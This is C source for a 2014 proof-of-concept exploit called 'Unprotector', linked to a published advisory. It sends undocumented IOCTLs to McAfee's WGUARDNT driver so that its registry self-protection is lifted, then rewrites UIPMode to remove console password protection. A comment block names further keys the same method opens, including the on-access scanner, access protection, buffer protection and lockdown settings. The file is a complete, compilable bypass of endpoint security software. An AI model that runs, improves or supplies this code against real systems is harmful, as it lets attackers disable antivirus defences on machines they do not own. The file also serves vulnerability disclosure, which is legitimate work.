/*****************************************************************************
 *
 *  McAfee Data Protector "Unprotector"
 *
 *  A small tool that asks the McAfee scan engine, through its WGUARDNT
 *  device, to stop protecting its registry keys so that the console
 *  password protection (UIPMode) can be switched off.
 *
 *  Advisory: http://lab.mediaservice.net/advisory/2014-01-mcafee.txt
 *
 *  This program can be compiled with MinGW (http://www.mingw.org/)
 *
 *  Copyright (c) 2014 @ Mediaservice.net Srl. All rights reserved
 *  Written by Maurizio Agazzini
 *
 *  This program is free software; you can redistribute it and/or
 *  modify it under the terms of the GNU General Public License
 *  as published by the Free Software Foundation; either version 2
 *  of the License, or (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place
 *  Suite 330, Boston, MA 02111-1307, USA.
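*****************************************************************************/

#include <windows.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>

/* The original code used the bare literal 0x0200 here; that is
 * KEY_WOW64_32KEY. Older MinGW headers may not define the macro. */
#ifndef KEY_WOW64_32KEY
#define KEY_WOW64_32KEY 0x0200
#endif

/*
 * IOCTLs sent to the WGUARDNT device (see the advisory referenced in the
 * file header). The first asks the scan engine to stop protecting its
 * registry keys, the second asks it to protect them again.
 */
#define IOCTL_WGUARD_UNPROTECT 0x9EDB6510u
#define IOCTL_WGUARD_PROTECT   0x9EDB6514u

/* Native and 32-bit-redirected paths of the DesktopProtection key. */
#define MCAFEE_DP_KEY       "SOFTWARE\\McAfee\\DesktopProtection"
#define MCAFEE_DP_KEY_WOW64 "SOFTWARE\\Wow6432Node\\McAfee\\DesktopProtection"

/* Human-readable meaning of the UIPMode values 0..3. */
static const char *const uipmode_name[] = {
    "No password",
    "Password protection for all items listed",
    "Password protection for the selected items",
    "Password protection for conformance to Common Criteria"
};

/*
 * Return the description of a UIPMode value, or "unknown" when the value
 * is outside the table. The original indexed the table directly with a
 * registry value it had not checked, i.e. an out-of-bounds read on any
 * UIPMode >= 4 or when the query failed.
 */
static const char *describe_uipmode(DWORD mode)
{
    if (mode < sizeof(uipmode_name) / sizeof(uipmode_name[0]))
        return uipmode_name[mode];
    return "unknown";
}

/*
 * Open the McAfee WGUARDNT device.
 *
 * The plain and \Global\ device names are tried, first with read-only and
 * then with read/write access, in that order.
 *
 * Returns an open handle, or INVALID_HANDLE_VALUE when every attempt
 * failed. CreateFile reports failure with INVALID_HANDLE_VALUE, not NULL;
 * the original compared against NULL, so its fallbacks never ran and the
 * caller went on to issue IOCTLs on an invalid handle.
 */
HANDLE opendevice(void)
{
    static const char *const names[] = {
        "\\\\.\\WGUARDNT",
        "\\\\.\\Global\\WGUARDNT"
    };
    static const DWORD access[] = {
        GENERIC_READ,
        GENERIC_READ | GENERIC_WRITE
    };
    size_t a, n;

    for (a = 0; a < sizeof(access) / sizeof(access[0]); a++) {
        for (n = 0; n < sizeof(names) / sizeof(names[0]); n++) {
            HANDLE h = CreateFile(names[n], access[a], 0, NULL, OPEN_EXISTING,
                                  FILE_FLAG_OVERLAPPED, NULL);
            if (h != INVALID_HANDLE_VALUE && h != NULL)
                return h;
        }
    }
    return INVALID_HANDLE_VALUE;
}

/*
 * Open the DesktopProtection key under HKLM with the given access rights,
 * trying the native path first and the Wow6432Node path second.
 *
 * On success *out receives the key handle and the path that worked is
 * returned so the caller can reopen the same key later. On failure *out
 * is NULL and NULL is returned.
 */
static const char *open_dp_key(REGSAM access, HKEY *out)
{
    static const char *const paths[] = { MCAFEE_DP_KEY, MCAFEE_DP_KEY_WOW64 };
    size_t i;

    for (i = 0; i < sizeof(paths) / sizeof(paths[0]); i++) {
        if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, paths[i], 0, access, out)
                == ERROR_SUCCESS)
            return paths[i];
    }
    *out = NULL;
    return NULL;
}

/*
 * Parse the optional UIPMode argument (decimal, non-negative).
 *
 * Returns 0 and stores the value in *mode on success, -1 on malformed or
 * out-of-range input. The original used atoi(), which silently turns any
 * garbage into 0 and lets negative values wrap.
 */
static int parse_mode(const char *arg, DWORD *mode)
{
    char *end;
    unsigned long v;

    if (arg == NULL || *arg == '\0' || *arg == '-')
        return -1;
    errno = 0;
    v = strtoul(arg, &end, 10);
    if (end == arg || *end != '\0' || errno == ERANGE || v > 0xFFFFFFFFul)
        return -1;
    *mode = (DWORD)v;
    return 0;
}

/*
 * Entry point.
 *
 * Usage: unprotector [UIPMode]
 *
 * Reads the current UIPMode, asks the scan engine to drop its registry
 * protection, writes the requested UIPMode (0 when no argument is given),
 * and finally asks the engine to protect the keys again. Returns 0 on
 * success, 1 on any failure. Protection is re-enabled and the device
 * handle closed on every path that reached the engine.
 *
 * The PoC uses HKLM\SOFTWARE\McAfee\DesktopProtection\UIPMode to disable
 * the password protection, but the same technique gives access to other
 * useful keys:
 *
 *   User Password
 *     HKLM\SOFTWARE\McAfee\DesktopProtection\UIP
 *     HKLM\SOFTWARE\McAfee\DesktopProtection\UIPEx
 *
 *   Buffer protection
 *     HKLM\SOFTWARE\McAfee\SystemCore\VSCore\On Access Scanner\BehaviourBlocking\BOPEnabled
 *
 *   Access protection
 *     HKLM\SOFTWARE\McAfee\SystemCore\VSCore\On Access Scanner\BehaviourBlocking\APEnabled
 *
 *   On Access Scanner
 *     HKLM\SOFTWARE\McAfee\DesktopProtection\OASState
 *     HKLM\SOFTWARE\McAfee\SystemCore\VSCore\On Access Scanner\McShield\Configuration\OASEnabled
 *
 *   Others
 *     HKLM\SOFTWARE\McAfee\SystemCore\VSCore\LockDownEnabled
 */
int main(int argc, char **argv)
{
    HKEY key = NULL;
    HANDLE dev;
    DWORD bytes_returned = 0;
    DWORD cur_mode = 0;
    DWORD new_mode = 0;
    DWORD size = sizeof(cur_mode);
    DWORD type = REG_DWORD;
    const char *path;
    LONG rc;
    int status = 0;

    printf("\n *******************************************\n");
    printf(" * McAfee Desktop Protection \"Unprotector\" *\n");
    printf(" *******************************************\n\n");

    /* Validate the argument before touching the driver, so a typo does not
     * leave protection disabled while we bail out. */
    if (argc > 1 && parse_mode(argv[1], &new_mode) != 0) {
        printf(" [-] Invalid UIPMode \"%s\": expected a non-negative number\n\n",
               argv[1]);
        return 1;
    }

    /* Phase 1: read the current mode. Read access needs no help from the
     * engine, so the device is not opened yet. */
    path = open_dp_key(KEY_QUERY_VALUE | KEY_READ | KEY_WOW64_32KEY, &key);
    if (path == NULL) {
        printf("Error opening registry key...\n");
        return 1;
    }
    rc = RegQueryValueEx(key, "UIPMode", NULL, &type, (BYTE *)&cur_mode, &size);
    RegCloseKey(key);
    key = NULL;
    if (rc != ERROR_SUCCESS || type != REG_DWORD || size != sizeof(cur_mode)) {
        printf(" [-] Could not read UIPMode (error %ld)\n\n", (long)rc);
        return 1;
    }
    printf(" [+] Current UIPMode = %lu (%s)\n\n",
           (unsigned long)cur_mode, describe_uipmode(cur_mode));

    /* Phase 2: ask the engine to stop protecting its keys. */
    dev = opendevice();
    if (dev == INVALID_HANDLE_VALUE) {
        printf(" [-] Could not open the WGUARDNT device (error %lu)\n\n",
               (unsigned long)GetLastError());
        return 1;
    }

    printf(" [-] Please John, let me write to your registry keys...");
    /* The original ignored this result. The handle is overlapped and no
     * OVERLAPPED structure is passed, so a FALSE return is not necessarily
     * a real failure; the write-access open below is the real test. */
    if (!DeviceIoControl(dev, IOCTL_WGUARD_UNPROTECT, NULL, 0, NULL, 0,
                         &bytes_returned, NULL))
        printf(" (IOCTL returned error %lu)", (unsigned long)GetLastError());

    /* Reopen the key that worked in phase 1, now with write access. The
     * original retried the native path twice and never the Wow6432Node one. */
    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, path, 0,
                     KEY_QUERY_VALUE | KEY_READ | KEY_SET_VALUE, &key)
            != ERROR_SUCCESS) {
        printf(" hmmm hmmm something went wrong!\n\n");
        status = 1;
        goto restore;
    }
    printf(" OK\n");

    /* Disable (or set) the password protection mode. */
    if (RegSetValueEx(key, "UIPMode", 0, REG_DWORD,
                      (CONST BYTE *)&new_mode, sizeof(new_mode)) != ERROR_SUCCESS) {
        printf("\n hmmm hmmm something went wrong!\n");
        status = 1;
    } else {
        printf("\n [+] Thank you! now we got the control! UIPMode = %lu\n",
               (unsigned long)new_mode);
    }
    RegCloseKey(key);
    key = NULL;

    printf("\n [+] Run \"%s %lu\" to get original settings\n\n",
           argv[0], (unsigned long)cur_mode);

restore:
    /* Always hand control back to the engine before leaving. */
    printf(" [-] Ok John, take the control again!\n");
    if (!DeviceIoControl(dev, IOCTL_WGUARD_PROTECT, NULL, 0, NULL, 0,
                         &bytes_returned, NULL))
        printf(" [-] Warning: re-enabling protection returned error %lu\n",
               (unsigned long)GetLastError());
    CloseHandle(dev);
    return status;
}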